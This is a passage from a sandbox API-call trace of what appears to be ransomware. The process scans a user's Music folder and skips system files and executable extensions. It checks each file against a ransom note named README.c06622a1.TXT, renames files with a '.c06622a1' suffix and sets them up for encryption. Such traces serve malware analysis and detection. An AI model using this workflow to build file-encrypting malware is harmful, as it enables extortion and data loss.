HALPmcxz\\Music" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music")) returned 0x11 [0159.516] PathAddBackslashW (in: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" | out: pszPath="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned="" [0159.516] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\") returned 0x28 [0159.516] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\*", fInfoLevelId=0x0, lpFindFileData=0x32ed9c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x32ed9c) returned 0x154148 [0159.516] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8cc66e40, ftLastAccessTime.dwHighDateTime=0x1d6eb2b, ftLastWriteTime.dwLowDateTime=0x8cc66e40, ftLastWriteTime.dwHighDateTime=0x1d6eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0159.516] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97759bd0, ftCreationTime.dwHighDateTime=0x1d5d7b4, ftLastAccessTime.dwLowDateTime=0x9091d2c0, ftLastAccessTime.dwHighDateTime=0x1d5e475, ftLastWriteTime.dwLowDateTime=0x9091d2c0, ftLastWriteTime.dwHighDateTime=0x1d5e475, nFileSizeHigh=0x0, nFileSizeLow=0x12c82, dwReserved0=0x0, dwReserved1=0x0, cFileName="CnOPGHSASieb.m4a", cAlternateFileName="CNOPGH~1.M4A")) returned 1 [0159.516] _wcsicmp (_Str1="CnOPGHSASieb.m4a", _Str2="README.c06622a1.TXT") returned -15 [0159.516] wcsstr (_Str="CnOPGHSASieb.m4a", _SubStr="README") returned 0x0 [0159.516] _wcsicmp (_Str1="autorun.inf", _Str2="CnOPGHSASieb.m4a") returned -2 [0159.516] wcslen (_String="autorun.inf") returned 0xb [0159.516] _wcsicmp (_Str1="boot.ini", _Str2="CnOPGHSASieb.m4a") returned -1 [0159.516] wcslen (_String="boot.ini") returned 0x8 [0159.516] _wcsicmp (_Str1="bootfont.bin", _Str2="CnOPGHSASieb.m4a") returned -1 [0159.516] wcslen (_String="bootfont.bin") returned 0xc [0159.516] _wcsicmp (_Str1="bootsect.bak", _Str2="CnOPGHSASieb.m4a") returned -1 [0159.516] wcslen (_String="bootsect.bak") returned 0xc [0159.516] _wcsicmp (_Str1="desktop.ini", _Str2="CnOPGHSASieb.m4a") returned 1 [0159.516] wcslen (_String="desktop.ini") returned 0xb [0159.516] _wcsicmp (_Str1="iconcache.db", _Str2="CnOPGHSASieb.m4a") returned 6 [0159.517] wcslen (_String="iconcache.db") returned 0xc [0159.517] _wcsicmp (_Str1="ntldr", _Str2="CnOPGHSASieb.m4a") returned 11 [0159.517] wcslen (_String="ntldr") returned 0x5 [0159.517] _wcsicmp (_Str1="ntuser.dat", _Str2="CnOPGHSASieb.m4a") returned 11 [0159.517] wcslen (_String="ntuser.dat") returned 0xa [0159.517] _wcsicmp (_Str1="ntuser.dat.log", _Str2="CnOPGHSASieb.m4a") returned 11 [0159.517] wcslen (_String="ntuser.dat.log") returned 0xe [0159.517] _wcsicmp (_Str1="ntuser.ini", _Str2="CnOPGHSASieb.m4a") returned 11 [0159.517] wcslen (_String="ntuser.ini") returned 0xa [0159.517] _wcsicmp (_Str1="thumbs.db", _Str2="CnOPGHSASieb.m4a") returned 17 [0159.517] wcslen (_String="thumbs.db") returned 0x9 [0159.517] _wcsicmp (_Str1="386", _Str2="m4a") returned -58 [0159.517] wcslen (_String="386") returned 0x3 [0159.517] _wcsicmp (_Str1="adv", _Str2="m4a") returned -12 [0159.517] wcslen (_String="adv") returned 0x3 [0159.517] _wcsicmp (_Str1="ani", _Str2="m4a") returned -12 [0159.517] wcslen (_String="ani") returned 0x3 [0159.517] _wcsicmp (_Str1="bat", _Str2="m4a") returned -11 [0159.517] wcslen (_String="bat") returned 0x3 [0159.517] _wcsicmp (_Str1="bin", _Str2="m4a") returned -11 [0159.517] wcslen (_String="bin") returned 0x3 [0159.517] _wcsicmp (_Str1="cab", _Str2="m4a") returned -10 [0159.517] wcslen (_String="cab") returned 0x3 [0159.517] _wcsicmp (_Str1="cmd", _Str2="m4a") returned -10 [0159.517] wcslen (_String="cmd") returned 0x3 [0159.517] _wcsicmp (_Str1="com", _Str2="m4a") returned -10 [0159.517] wcslen (_String="com") returned 0x3 [0159.517] _wcsicmp (_Str1="cpl", _Str2="m4a") returned -10 [0159.517] wcslen (_String="cpl") returned 0x3 [0159.517] _wcsicmp (_Str1="cur", _Str2="m4a") returned -10 [0159.517] wcslen (_String="cur") returned 0x3 [0159.517] _wcsicmp (_Str1="deskthemepack", _Str2="m4a") returned -9 [0159.517] wcslen (_String="deskthemepack") returned 0xd [0159.518] _wcsicmp (_Str1="diagcab", _Str2="m4a") returned -9 [0159.518] wcslen (_String="diagcab") returned 0x7 [0159.518] _wcsicmp (_Str1="diagcfg", _Str2="m4a") returned -9 [0159.518] wcslen (_String="diagcfg") returned 0x7 [0159.518] _wcsicmp (_Str1="diagpkg", _Str2="m4a") returned -9 [0159.518] wcslen (_String="diagpkg") returned 0x7 [0159.518] _wcsicmp (_Str1="dll", _Str2="m4a") returned -9 [0159.518] wcslen (_String="dll") returned 0x3 [0159.518] _wcsicmp (_Str1="drv", _Str2="m4a") returned -9 [0159.518] wcslen (_String="drv") returned 0x3 [0159.518] _wcsicmp (_Str1="exe", _Str2="m4a") returned -8 [0159.518] wcslen (_String="exe") returned 0x3 [0159.518] _wcsicmp (_Str1="hlp", _Str2="m4a") returned -5 [0159.518] wcslen (_String="hlp") returned 0x3 [0159.518] _wcsicmp (_Str1="icl", _Str2="m4a") returned -4 [0159.518] wcslen (_String="icl") returned 0x3 [0159.518] _wcsicmp (_Str1="icns", _Str2="m4a") returned -4 [0159.518] wcslen (_String="icns") returned 0x4 [0159.518] _wcsicmp (_Str1="ico", _Str2="m4a") returned -4 [0159.518] wcslen (_String="ico") returned 0x3 [0159.518] _wcsicmp (_Str1="ics", _Str2="m4a") returned -4 [0159.518] wcslen (_String="ics") returned 0x3 [0159.518] _wcsicmp (_Str1="idx", _Str2="m4a") returned -4 [0159.518] wcslen (_String="idx") returned 0x3 [0159.519] _wcsicmp (_Str1="ldf", _Str2="m4a") returned -1 [0159.519] wcslen (_String="ldf") returned 0x3 [0159.519] _wcsicmp (_Str1="lnk", _Str2="m4a") returned -1 [0159.519] wcslen (_String="lnk") returned 0x3 [0159.519] _wcsicmp (_Str1="mod", _Str2="m4a") returned 59 [0159.519] wcslen (_String="mod") returned 0x3 [0159.519] _wcsicmp (_Str1="mpa", _Str2="m4a") returned 60 [0159.519] wcslen (_String="mpa") returned 0x3 [0159.519] _wcsicmp (_Str1="msc", _Str2="m4a") returned 63 [0159.519] wcslen (_String="msc") returned 0x3 [0159.519] _wcsicmp (_Str1="msp", _Str2="m4a") returned 63 [0159.519] wcslen (_String="msp") returned 0x3 [0159.519] _wcsicmp (_Str1="msstyles", _Str2="m4a") returned 63 [0159.519] wcslen (_String="msstyles") returned 0x8 [0159.519] _wcsicmp (_Str1="msu", _Str2="m4a") returned 63 [0159.519] wcslen (_String="msu") returned 0x3 [0159.519] _wcsicmp (_Str1="nls", _Str2="m4a") returned 1 [0159.519] wcslen (_String="nls") returned 0x3 [0159.519] _wcsicmp (_Str1="nomedia", _Str2="m4a") returned 1 [0159.519] wcslen (_String="nomedia") returned 0x7 [0159.519] _wcsicmp (_Str1="ocx", _Str2="m4a") returned 2 [0159.519] wcslen (_String="ocx") returned 0x3 [0159.519] _wcsicmp (_Str1="prf", _Str2="m4a") returned 3 [0159.519] wcslen (_String="prf") returned 0x3 [0159.519] _wcsicmp (_Str1="ps1", _Str2="m4a") returned 3 [0159.519] wcslen (_String="ps1") returned 0x3 [0159.519] _wcsicmp (_Str1="rom", _Str2="m4a") returned 5 [0159.519] wcslen (_String="rom") returned 0x3 [0159.519] _wcsicmp (_Str1="rtp", _Str2="m4a") returned 5 [0159.519] wcslen (_String="rtp") returned 0x3 [0159.519] _wcsicmp (_Str1="scr", _Str2="m4a") returned 6 [0159.520] wcslen (_String="scr") returned 0x3 [0159.520] _wcsicmp (_Str1="shs", _Str2="m4a") returned 6 [0159.520] wcslen (_String="shs") returned 0x3 [0159.520] _wcsicmp (_Str1="spl", _Str2="m4a") returned 6 [0159.520] wcslen (_String="spl") returned 0x3 [0159.520] _wcsicmp (_Str1="sys", _Str2="m4a") returned 6 [0159.520] wcslen (_String="sys") returned 0x3 [0159.520] _wcsicmp (_Str1="theme", _Str2="m4a") returned 7 [0159.520] wcslen (_String="theme") returned 0x5 [0159.520] _wcsicmp (_Str1="themepack", _Str2="m4a") returned 7 [0159.520] wcslen (_String="themepack") returned 0x9 [0159.520] _wcsicmp (_Str1="wpx", _Str2="m4a") returned 10 [0159.520] wcslen (_String="wpx") returned 0x3 [0159.520] _wcsicmp (_Str1="lock", _Str2="m4a") returned -1 [0159.520] wcslen (_String="lock") returned 0x4 [0159.520] _wcsicmp (_Str1="key", _Str2="m4a") returned -2 [0159.520] wcslen (_String="key") returned 0x3 [0159.520] _wcsicmp (_Str1="hta", _Str2="m4a") returned -5 [0159.520] wcslen (_String="hta") returned 0x3 [0159.520] _wcsicmp (_Str1="msi", _Str2="m4a") returned 63 [0159.520] wcslen (_String="msi") returned 0x3 [0159.520] _wcsicmp (_Str1="pdb", _Str2="m4a") returned 3 [0159.520] wcslen (_String="pdb") returned 0x3 [0159.520] _wcsicmp (_Str1="sqlite", _Str2="m4a") returned 6 [0159.520] wcslen (_String="sqlite") returned 0x6 [0159.520] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music")) returned 0x11 [0159.520] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0159.521] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" [0159.521] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned 0x27 [0159.521] wcscpy (in: _Dest=0x3210098, _Source="CnOPGHSASieb.m4a" | out: _Dest="CnOPGHSASieb.m4a") returned="CnOPGHSASieb.m4a" [0159.521] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CnOPGHSASieb.m4a", dwFileAttributes=0x80) returned 1 [0159.522] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CnOPGHSASieb.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\cnopghsasieb.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0159.522] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.522] ReadFile (in: hFile=0x1bc, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0159.523] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x48e7504e [0159.523] RtlComputeCrc32 (PartialCrc=0x504e, Buffer=0x32ec24, Length=0x80) returned 0xdf53fef5 [0159.523] RtlComputeCrc32 (PartialCrc=0xfef5, Buffer=0x32ec24, Length=0x80) returned 0xf3cdace9 [0159.523] RtlComputeCrc32 (PartialCrc=0xace9, Buffer=0x32ec24, Length=0x80) returned 0x9fbb0c56 [0159.523] RtlComputeCrc32 (PartialCrc=0xc56, Buffer=0x32ec24, Length=0x80) returned 0x40992d31 [0159.523] CloseHandle (hObject=0x1bc) returned 1 [0159.523] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0159.523] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CnOPGHSASieb.m4a" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CnOPGHSASieb.m4a") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CnOPGHSASieb.m4a" [0159.523] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CnOPGHSASieb.m4a") returned 0x38 [0159.523] wcscpy (in: _Dest=0x32200c0, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.523] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CnOPGHSASieb.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\cnopghsasieb.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CnOPGHSASieb.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\cnopghsasieb.m4a.c06622a1"), dwFlags=0x8) returned 1 [0159.528] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CnOPGHSASieb.m4a.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\cnopghsasieb.m4a.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1bc [0159.528] CreateIoCompletionPort (FileHandle=0x1bc, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0159.528] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x710020 [0159.532] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x29b54975 [0159.532] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x175fa7e9 [0159.532] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x72ff8dd9 [0159.532] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5b57c425 [0159.532] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x41db6708 [0159.532] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x53964d32 [0159.532] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7b7b4d70 [0159.532] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6beb096f [0159.535] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x710094, Length=0x80) returned 0x2fc41902 [0159.535] RtlComputeCrc32 (PartialCrc=0x1902, Buffer=0x710094, Length=0x80) returned 0xde2f15d9 [0159.535] RtlComputeCrc32 (PartialCrc=0x15d9, Buffer=0x710094, Length=0x80) returned 0x1eda2e55 [0159.536] RtlComputeCrc32 (PartialCrc=0x2e55, Buffer=0x710094, Length=0x80) returned 0x6dc3e9f2 [0159.536] RtlComputeCrc32 (PartialCrc=0xe9f2, Buffer=0x710094, Length=0x80) returned 0x5aff1804 [0159.536] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x710020) returned 1 [0159.536] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0159.536] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0159.536] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf65f90, ftCreationTime.dwHighDateTime=0x1d5d9f6, ftLastAccessTime.dwLowDateTime=0x57c50040, ftLastAccessTime.dwHighDateTime=0x1d5e38d, ftLastWriteTime.dwLowDateTime=0x57c50040, ftLastWriteTime.dwHighDateTime=0x1d5e38d, nFileSizeHigh=0x0, nFileSizeLow=0x16afd, dwReserved0=0x0, dwReserved1=0x0, cFileName="CNWwy.mp3", cAlternateFileName="")) returned 1 [0159.536] _wcsicmp (_Str1="CNWwy.mp3", _Str2="README.c06622a1.TXT") returned -15 [0159.536] wcsstr (_Str="CNWwy.mp3", _SubStr="README") returned 0x0 [0159.536] _wcsicmp (_Str1="autorun.inf", _Str2="CNWwy.mp3") returned -2 [0159.536] wcslen (_String="autorun.inf") returned 0xb [0159.536] _wcsicmp (_Str1="boot.ini", _Str2="CNWwy.mp3") returned -1 [0159.536] wcslen (_String="boot.ini") returned 0x8 [0159.536] _wcsicmp (_Str1="bootfont.bin", _Str2="CNWwy.mp3") returned -1 [0159.536] wcslen (_String="bootfont.bin") returned 0xc [0159.536] _wcsicmp (_Str1="bootsect.bak", _Str2="CNWwy.mp3") returned -1 [0159.536] wcslen (_String="bootsect.bak") returned 0xc [0159.536] _wcsicmp (_Str1="desktop.ini", _Str2="CNWwy.mp3") returned 1 [0159.536] wcslen (_String="desktop.ini") returned 0xb [0159.536] _wcsicmp (_Str1="iconcache.db", _Str2="CNWwy.mp3") returned 6 [0159.536] wcslen (_String="iconcache.db") returned 0xc [0159.536] _wcsicmp (_Str1="ntldr", _Str2="CNWwy.mp3") returned 11 [0159.536] wcslen (_String="ntldr") returned 0x5 [0159.536] _wcsicmp (_Str1="ntuser.dat", _Str2="CNWwy.mp3") returned 11 [0159.536] wcslen (_String="ntuser.dat") returned 0xa [0159.536] _wcsicmp (_Str1="ntuser.dat.log", _Str2="CNWwy.mp3") returned 11 [0159.536] wcslen (_String="ntuser.dat.log") returned 0xe [0159.536] _wcsicmp (_Str1="ntuser.ini", _Str2="CNWwy.mp3") returned 11 [0159.536] wcslen (_String="ntuser.ini") returned 0xa [0159.536] _wcsicmp (_Str1="thumbs.db", _Str2="CNWwy.mp3") returned 17 [0159.536] wcslen (_String="thumbs.db") returned 0x9 [0159.536] _wcsicmp (_Str1="386", _Str2="mp3") returned -58 [0159.536] wcslen (_String="386") returned 0x3 [0159.537] _wcsicmp (_Str1="adv", _Str2="mp3") returned -12 [0159.537] wcslen (_String="adv") returned 0x3 [0159.537] _wcsicmp (_Str1="ani", _Str2="mp3") returned -12 [0159.537] wcslen (_String="ani") returned 0x3 [0159.537] _wcsicmp (_Str1="bat", _Str2="mp3") returned -11 [0159.537] wcslen (_String="bat") returned 0x3 [0159.537] _wcsicmp (_Str1="bin", _Str2="mp3") returned -11 [0159.537] wcslen (_String="bin") returned 0x3 [0159.537] _wcsicmp (_Str1="cab", _Str2="mp3") returned -10 [0159.537] wcslen (_String="cab") returned 0x3 [0159.537] _wcsicmp (_Str1="cmd", _Str2="mp3") returned -10 [0159.537] wcslen (_String="cmd") returned 0x3 [0159.537] _wcsicmp (_Str1="com", _Str2="mp3") returned -10 [0159.537] wcslen (_String="com") returned 0x3 [0159.537] _wcsicmp (_Str1="cpl", _Str2="mp3") returned -10 [0159.537] wcslen (_String="cpl") returned 0x3 [0159.537] _wcsicmp (_Str1="cur", _Str2="mp3") returned -10 [0159.537] wcslen (_String="cur") returned 0x3 [0159.537] _wcsicmp (_Str1="deskthemepack", _Str2="mp3") returned -9 [0159.537] wcslen (_String="deskthemepack") returned 0xd [0159.537] _wcsicmp (_Str1="diagcab", _Str2="mp3") returned -9 [0159.537] wcslen (_String="diagcab") returned 0x7 [0159.537] _wcsicmp (_Str1="diagcfg", _Str2="mp3") returned -9 [0159.537] wcslen (_String="diagcfg") returned 0x7 [0159.537] _wcsicmp (_Str1="diagpkg", _Str2="mp3") returned -9 [0159.537] wcslen (_String="diagpkg") returned 0x7 [0159.537] _wcsicmp (_Str1="dll", _Str2="mp3") returned -9 [0159.537] wcslen (_String="dll") returned 0x3 [0159.537] _wcsicmp (_Str1="drv", _Str2="mp3") returned -9 [0159.537] wcslen (_String="drv") returned 0x3 [0159.537] _wcsicmp (_Str1="exe", _Str2="mp3") returned -8 [0159.537] wcslen (_String="exe") returned 0x3 [0159.537] _wcsicmp (_Str1="hlp", _Str2="mp3") returned -5 [0159.537] wcslen (_String="hlp") returned 0x3 [0159.537] _wcsicmp (_Str1="icl", _Str2="mp3") returned -4 [0159.537] wcslen (_String="icl") returned 0x3 [0159.537] _wcsicmp (_Str1="icns", _Str2="mp3") returned -4 [0159.537] wcslen (_String="icns") returned 0x4 [0159.538] _wcsicmp (_Str1="ico", _Str2="mp3") returned -4 [0159.538] wcslen (_String="ico") returned 0x3 [0159.538] _wcsicmp (_Str1="ics", _Str2="mp3") returned -4 [0159.538] wcslen (_String="ics") returned 0x3 [0159.538] _wcsicmp (_Str1="idx", _Str2="mp3") returned -4 [0159.538] wcslen (_String="idx") returned 0x3 [0159.538] _wcsicmp (_Str1="ldf", _Str2="mp3") returned -1 [0159.538] wcslen (_String="ldf") returned 0x3 [0159.538] _wcsicmp (_Str1="lnk", _Str2="mp3") returned -1 [0159.538] wcslen (_String="lnk") returned 0x3 [0159.538] _wcsicmp (_Str1="mod", _Str2="mp3") returned -1 [0159.538] wcslen (_String="mod") returned 0x3 [0159.538] _wcsicmp (_Str1="mpa", _Str2="mp3") returned 46 [0159.538] wcslen (_String="mpa") returned 0x3 [0159.538] _wcsicmp (_Str1="msc", _Str2="mp3") returned 3 [0159.538] wcslen (_String="msc") returned 0x3 [0159.538] _wcsicmp (_Str1="msp", _Str2="mp3") returned 3 [0159.538] wcslen (_String="msp") returned 0x3 [0159.538] _wcsicmp (_Str1="msstyles", _Str2="mp3") returned 3 [0159.538] wcslen (_String="msstyles") returned 0x8 [0159.538] _wcsicmp (_Str1="msu", _Str2="mp3") returned 3 [0159.538] wcslen (_String="msu") returned 0x3 [0159.538] _wcsicmp (_Str1="nls", _Str2="mp3") returned 1 [0159.538] wcslen (_String="nls") returned 0x3 [0159.538] _wcsicmp (_Str1="nomedia", _Str2="mp3") returned 1 [0159.538] wcslen (_String="nomedia") returned 0x7 [0159.538] _wcsicmp (_Str1="ocx", _Str2="mp3") returned 2 [0159.538] wcslen (_String="ocx") returned 0x3 [0159.538] _wcsicmp (_Str1="prf", _Str2="mp3") returned 3 [0159.538] wcslen (_String="prf") returned 0x3 [0159.538] _wcsicmp (_Str1="ps1", _Str2="mp3") returned 3 [0159.538] wcslen (_String="ps1") returned 0x3 [0159.538] _wcsicmp (_Str1="rom", _Str2="mp3") returned 5 [0159.538] wcslen (_String="rom") returned 0x3 [0159.538] _wcsicmp (_Str1="rtp", _Str2="mp3") returned 5 [0159.538] wcslen (_String="rtp") returned 0x3 [0159.538] _wcsicmp (_Str1="scr", _Str2="mp3") returned 6 [0159.539] wcslen (_String="scr") returned 0x3 [0159.539] _wcsicmp (_Str1="shs", _Str2="mp3") returned 6 [0159.539] wcslen (_String="shs") returned 0x3 [0159.539] _wcsicmp (_Str1="spl", _Str2="mp3") returned 6 [0159.539] wcslen (_String="spl") returned 0x3 [0159.539] _wcsicmp (_Str1="sys", _Str2="mp3") returned 6 [0159.539] wcslen (_String="sys") returned 0x3 [0159.539] _wcsicmp (_Str1="theme", _Str2="mp3") returned 7 [0159.539] wcslen (_String="theme") returned 0x5 [0159.539] _wcsicmp (_Str1="themepack", _Str2="mp3") returned 7 [0159.539] wcslen (_String="themepack") returned 0x9 [0159.539] _wcsicmp (_Str1="wpx", _Str2="mp3") returned 10 [0159.539] wcslen (_String="wpx") returned 0x3 [0159.539] _wcsicmp (_Str1="lock", _Str2="mp3") returned -1 [0159.539] wcslen (_String="lock") returned 0x4 [0159.539] _wcsicmp (_Str1="key", _Str2="mp3") returned -2 [0159.539] wcslen (_String="key") returned 0x3 [0159.539] _wcsicmp (_Str1="hta", _Str2="mp3") returned -5 [0159.539] wcslen (_String="hta") returned 0x3 [0159.539] _wcsicmp (_Str1="msi", _Str2="mp3") returned 3 [0159.539] wcslen (_String="msi") returned 0x3 [0159.539] _wcsicmp (_Str1="pdb", _Str2="mp3") returned 3 [0159.539] wcslen (_String="pdb") returned 0x3 [0159.539] _wcsicmp (_Str1="sqlite", _Str2="mp3") returned 6 [0159.539] wcslen (_String="sqlite") returned 0x6 [0159.539] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music")) returned 0x11 [0159.539] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0159.539] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music" [0159.539] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned 0x27 [0159.539] wcscpy (in: _Dest=0x3210098, _Source="CNWwy.mp3" | out: _Dest="CNWwy.mp3") returned="CNWwy.mp3" [0159.539] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CNWwy.mp3", dwFileAttributes=0x80) returned 1 [0159.540] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CNWwy.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\cnwwy.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c [0159.540] SetFilePointerEx (in: hFile=0x1c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.540] ReadFile (in: hFile=0x1c, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0159.541] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x9f3cef8 [0159.541] RtlComputeCrc32 (PartialCrc=0xcef8, Buffer=0x32ec24, Length=0x80) returned 0x63ae07e3 [0159.541] RtlComputeCrc32 (PartialCrc=0x7e3, Buffer=0x32ec24, Length=0x80) returned 0x1e5ccfd3 [0159.541] RtlComputeCrc32 (PartialCrc=0xcfd3, Buffer=0x32ec24, Length=0x80) returned 0x106802e2 [0159.541] RtlComputeCrc32 (PartialCrc=0x2e2, Buffer=0x32ec24, Length=0x80) returned 0xd735ea84 [0159.541] CloseHandle (hObject=0x1c) returned 1 [0159.541] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0159.541] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CNWwy.mp3" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CNWwy.mp3") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CNWwy.mp3" [0159.541] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CNWwy.mp3") returned 0x31 [0159.541] wcscpy (in: _Dest=0x32200b2, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0159.541] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CNWwy.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\cnwwy.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CNWwy.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\cnwwy.mp3.c06622a1"), dwFlags=0x8) returned 1 [0159.544] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\CNWwy.mp3.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\cnwwy.mp3.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1c [0159.544] CreateIoCompletionPort (FileHandle=0x1c, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0159.545] RtlAllocateHeap (HeapHandle=0x130000, 